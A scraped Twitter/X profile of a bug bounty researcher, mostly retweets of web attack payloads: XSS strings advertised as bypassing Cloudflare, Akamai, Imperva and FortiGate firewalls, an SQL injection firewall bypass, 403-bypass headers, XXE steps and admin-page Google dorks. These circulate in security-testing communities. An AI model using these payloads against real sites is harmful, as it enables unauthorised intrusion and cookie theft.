eSecHax0r Profile Banner
Ketan Mukane ๐Ÿ‡ฎ๐Ÿ‡ณ Profile
Ketan Mukane ๐Ÿ‡ฎ๐Ÿ‡ณ

@eSecHax0r

Followers
387
Following
367
Media
121
Statuses
1K

Ethical Hacker & Web Application Security Researcher | Google and Facebook Hall Of Fame Holder | Stock Market & Cryptocurrency Market Retail Investor

Maharashtra, India
Joined February 2017
Don't wanna be here? Send us removal request.
@eSecHax0r
Ketan Mukane ๐Ÿ‡ฎ๐Ÿ‡ณ
6 years
Yes, I Was Awarded a Bounty From Facebook. || เคถเฅเคฐเฅ€ ||. Thank You @Facebook :). @openbugbounty , @Bugcrowd , @Hacker0x01 , @NCIIPC , @DrexelUniv , @cPanel , @kalilinux , @KITKarlsruhe , @Harvard , @Cambridge_Uni ,@UniofOxford
Tweet media one
9
2
97
@eSecHax0r
Ketan Mukane ๐Ÿ‡ฎ๐Ÿ‡ณ
7 months
RT @KN0X55: ๐Ÿšจ #XSS Payload to Use EVERYWHERE! ๐Ÿšจ. JavaScript://%250A/*?'/*\'/*"/*\"/*`/*\`/*%26apos;)/*.<!--</Title/</Style/</Script/</textAโ€ฆ.
0
45
0
@eSecHax0r
Ketan Mukane ๐Ÿ‡ฎ๐Ÿ‡ณ
7 months
RT @viehgroup: Bug Bounty Tip : XML External Entity(XXE). 1.Go to the file upload functionality in the application. 2.Upload a XML fileโ€ฆ.
0
30
0
@eSecHax0r
Ketan Mukane ๐Ÿ‡ฎ๐Ÿ‡ณ
7 months
RT @viehgroup: [+] 403 bypass methodology !. 1- using space symbols.exmaple:./admin -> 403./admin%09 -> 200./admin%20 -> 200. 2- use traverโ€ฆ.
0
83
0
@eSecHax0r
Ketan Mukane ๐Ÿ‡ฎ๐Ÿ‡ณ
9 months
RT @BRuteLogic: #SQL Injection #Bypass Akamai #WAF.(Using #HPP). q=1'Union DistinctRow/*&q=*/Select 1. #hack2learn ๐Ÿ’ช
Tweet media one
0
51
0
@eSecHax0r
Ketan Mukane ๐Ÿ‡ฎ๐Ÿ‡ณ
9 months
RT @xss0r: #Fortinet_Fortigate_XSS_Bypass by xss0r.#Payload: <dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a()%20x>. #xss0r #xss #xsspayloadsโ€ฆ.
0
48
0
@eSecHax0r
Ketan Mukane ๐Ÿ‡ฎ๐Ÿ‡ณ
9 months
RT @XssPayloads: A payload to bypass Fortinet FortiGate, by @xss0r .<dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a()%20x>.
0
20
0
@eSecHax0r
Ketan Mukane ๐Ÿ‡ฎ๐Ÿ‡ณ
9 months
RT @KN0X55: We just found a variation of our current .CloudFlare #XSS #Bypass!. OnXSS=<Img/Src/OnError=alert(1)>. It's better than our prevโ€ฆ.
0
46
0
@eSecHax0r
Ketan Mukane ๐Ÿ‡ฎ๐Ÿ‡ณ
9 months
RT @XssPayloads: A payload to bypass some WAF filters by @0x0SojalSec .<input accesskey=X onclick="self['wind'+'ow']['one'+'rror']=alert;thโ€ฆ.
0
15
0
@eSecHax0r
Ketan Mukane ๐Ÿ‡ฎ๐Ÿ‡ณ
9 months
RT @XssPayloads: An AngularJS Client-Side Template Injection by @0x0SojalSec, inspired by @garethheyes .{{'a'.constructor.prototype.charAt=โ€ฆ.
0
10
0
@eSecHax0r
Ketan Mukane ๐Ÿ‡ฎ๐Ÿ‡ณ
10 months
RT @XssPayloads: A FortiGate WAF bypass payload by @xss0r .<details open ontoggle="(()=>alert`ibrahimxss`)()"></details>.
0
25
0
@eSecHax0r
Ketan Mukane ๐Ÿ‡ฎ๐Ÿ‡ณ
10 months
RT @bountywriteups: ๐Ÿšจ Open Redirect to XSS ๐Ÿšจ . javascript:alert(1).java%00script: .java%0Ascript: .java&tab;script:.java%0Ascript:al%0Aert(โ€ฆ.
0
51
0
@eSecHax0r
Ketan Mukane ๐Ÿ‡ฎ๐Ÿ‡ณ
10 months
RT @bountywriteups: ๐Ÿ”ฐ 403 Bypass Payloads ๐Ÿ”ฐ . Base-Url: 127.0.0.1.Client-IP: 127.0.0.1.Http-Url: 127.0.0.1.Proxy-Host: 127.0.0.1.Proxy-Url:โ€ฆ.
0
66
0
@eSecHax0r
Ketan Mukane ๐Ÿ‡ฎ๐Ÿ‡ณ
10 months
RT @BRuteLogic: One #XSS Payload to Rule Them All. #Bypass Akamai, Imperva and CloudFlare #WAF. <A HRef=//X55.is AutoFocus %26%2362 OnFocusโ€ฆ.
0
166
0
@eSecHax0r
Ketan Mukane ๐Ÿ‡ฎ๐Ÿ‡ณ
10 months
RT @XssPayloads: A payload that bypasses Akamai, Imperva and CloudFlare WAF, by @BRuteLogic .<A HRef=//X55.is AutoFocus %26%2362 OnFocus%0Cโ€ฆ.
0
43
0
@eSecHax0r
Ketan Mukane ๐Ÿ‡ฎ๐Ÿ‡ณ
11 months
RT @thecybertix: ๐—–๐—น๐—ผ๐˜‚๐—ฑ๐—ณ๐—น๐—ฎ๐—ฟ๐—ฒ ๐—•๐˜†๐—ฝ๐—ฎ๐˜€๐˜€ ๐—ฃ๐—ฎ๐˜†๐—น๐—ผ๐—ฎ๐—ฑ. 0</option></select><img/src=xon=()onx+honerror=alert(1)>ss<svg/onloadโ€‹=prompt(document.cookie)%โ€ฆ.
0
36
0
@eSecHax0r
Ketan Mukane ๐Ÿ‡ฎ๐Ÿ‡ณ
1 year
RT @ibrahimxss_: WAF Fortinet FortiGate XSS Bypass:. #Payload: .<details open ontoggle="(()=>alert`ibrahimxss`)()"></details>. #xss #xssbypโ€ฆ.
0
67
0
@eSecHax0r
Ketan Mukane ๐Ÿ‡ฎ๐Ÿ‡ณ
1 year
RT @ibrahimxss_: The only XSS tool which can detect "detct "#onhover", "#Onfocus" "#oNpagEshoW".POST-based XSS + CloudFlare Bypass with #IBโ€ฆ.
0
80
0
@eSecHax0r
Ketan Mukane ๐Ÿ‡ฎ๐Ÿ‡ณ
1 year
RT @ibrahimxss_: CloudFlare XSS Bypass.New XSS Payload, worked on many CF:. Payload: "*prompt(document.domain)*"
Tweet media one
0
97
0
@eSecHax0r
Ketan Mukane ๐Ÿ‡ฎ๐Ÿ‡ณ
1 year
RT @bountywriteups: ๐Ÿš€ Top Google Dorks for Bug Bounty Hunting! ๐Ÿ”. inurl:admin - Admin pages.intitle:"Index of" - Directory listings.filetypโ€ฆ.
0
25
0
@eSecHax0r
Ketan Mukane ๐Ÿ‡ฎ๐Ÿ‡ณ
1 year
RT @sratarun: Updated imperva waf bypass payload. <c/onpointerrawupdate=d=document,b=%27%60%27,d[%27loca%27%2B%27tion%27]=%27javascript%26cโ€ฆ.
0
20
0